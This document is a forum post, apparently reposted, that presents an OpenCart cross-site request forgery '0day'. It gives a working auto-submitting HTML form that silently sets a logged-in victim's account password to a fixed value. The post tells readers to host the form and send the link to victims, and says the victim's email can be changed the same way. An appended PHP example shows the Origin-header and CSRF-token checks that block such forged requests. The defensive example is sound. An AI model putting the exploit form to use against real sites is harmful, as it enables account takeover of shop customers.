Open Cart CSRF 0day (Working all versions)



I found a CSRF in Open Cart CMS. Through this you can update the victim's password.

Here is the HTML form code:

<SCRIPT LANGUAGE="JavaScript"><!--
setTimeout('document.test.submit()',1000);
//--></SCRIPT>

<form name="test" action="http://127.0.0.1/upload/index.php?route=account/password" method="post">
<input name="password" value="w3bdrill3r" type="hidden">
<input name="confirm" value="w3bdrill3r" type="hidden">
<input value="Submit" type="submit">
</form>

Save the above code as "OC.html" and replace 127.0.0.1 with the victim's website. Now upload OC.html to any host and send the link to the victim. With just one click by the victim, their password will be changed to "w3bdrill3r". You can change the victim's email too with this exploit. The JavaScript code automatically submits the form, so the victim does not even need to click the submit button. It's the 1st vulnerability I ever found in any CMS, so I hope you will like it.


Source: madleets
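An added defensive example, not part of the original post and not OpenCart's own code: the server-side check whose absence lets the auto-submitting form above succeed. The function names, the `csrf_token` field and the `attacker.example` origin are assumptions made for illustration.

```php
<?php
// Hypothetical helpers for illustration; these are not OpenCart APIs.

// Issue one random token per session; the shop embeds it as a hidden field in its own password form.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing POST only if it comes from the shop's own origin AND carries the session token.
function is_request_trusted(array $session, array $post, array $server, string $siteOrigin): bool {
    // 1. Origin (falling back to Referer) must match the shop's scheme://host[:port].
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $parts  = parse_url($source);
    if (!is_array($parts) || empty($parts['scheme']) || empty($parts['host'])) {
        return false; // missing, "null" or malformed origin
    }
    $origin = $parts['scheme'] . '://' . $parts['host']
            . (isset($parts['port']) ? ':' . $parts['port'] : '');
    if (!hash_equals($siteOrigin, $origin)) {
        return false;
    }
    // 2. The submitted token must equal the session token (constant-time comparison).
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// --- Constructed sample requests ---
$site    = 'http://127.0.0.1';
$session = [];
$token   = csrf_token($session);

// The cross-site form from the post: only password/confirm, no token, foreign origin.
$forgedPost   = ['password' => 'w3bdrill3r', 'confirm' => 'w3bdrill3r'];
$forgedServer = ['HTTP_ORIGIN' => 'http://attacker.example'];

// The shop's own form: same fields plus the session token, same origin.
$legitPost   = ['password' => 'new-pass', 'confirm' => 'new-pass', 'csrf_token' => $token];
$legitServer = ['HTTP_ORIGIN' => 'http://127.0.0.1'];

foreach (['forged' => [$forgedPost, $forgedServer], 'legit' => [$legitPost, $legitServer]] as $name => [$p, $s]) {
    echo $name, ': ', is_request_trusted($session, $p, $s, $site) ? 'accepted' : 'rejected', PHP_EOL;
}
```

Requiring the current password on this form is a second, independent control, since the forged form only supplies `password` and `confirm`.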